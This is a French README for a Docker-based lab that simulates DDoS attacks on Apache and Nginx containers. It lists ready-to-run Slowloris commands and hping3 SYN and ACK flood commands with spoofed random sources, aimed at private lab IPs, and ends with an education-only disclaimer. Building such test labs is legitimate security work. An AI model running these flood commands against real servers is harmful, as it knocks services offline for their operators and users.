Ce projet met à disposition une collection d'outils performants de simuler des attaques DDoS sur des serveurs Apache et Nginx. Ces outils s'avèrent précieux pour les tests et l'évaluation de la sécurité des infrastructures web.
- Docker et Docker Compose doivent être installés sur votre machine.
- Construction et exécution des conteneurs
docker-compose -f stack.yml up -d --build
# build images and run containers
```bash
docker-compose -f stack.yml up -d --build
- Attaques HTTP Flood
- Attaque Slowloris contre le serveur Apache
docker exec -ti attacker-DDOS /bin/bash -c "slowloris 172.20.0.2 -s 1000"
- Attaque Slowloris contre le serveur Nginx
docker exec -ti attacker-DDOS /bin/bash -c "slowloris 172.20.0.3 -s 1000"
- Attaques SYN Flood
- Attaque SYN Flood contre le serveur Apache
docker exec -ti attacker-DDOS /bin/bash -c "hping3 -S -c 100000 -d 1000 -p 80 --flood --rand-source 172.20.0.2"
- Attaque SYN Flood contre le serveur Nginx
docker exec -ti attacker-DDOS /bin/bash -c "hping3 -S -c 100000 -d 1000 -p 80 --flood --rand-source 172.20.0.3"
- Attaques ACK Flood
- Attaque ACK Flood contre le serveur Apache
docker exec -ti attacker-DDOS /bin/bash -c "hping3 -A -c 100000 -d 1000 -p 80 --flood --rand-source 172.20.0.2"
- Attaque ACK Flood contre le serveur Nginx
docker exec -ti attacker-DDOS /bin/bash -c "hping3 -A -c 100000 -d 1000 -p 80 --flood --rand-source 172.20.0.3"
- Arrêt et suppression des conteneurs
docker-compose -f stack.yml down
Ce projet est uniquement destiné à des fins éducatives et de test. L'utilisation de ces outils contre des systèmes sans autorisation est illégale.
Ahmat Mahamat Ahmat
Email : ahmatmhtlouky@gmail.com
Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.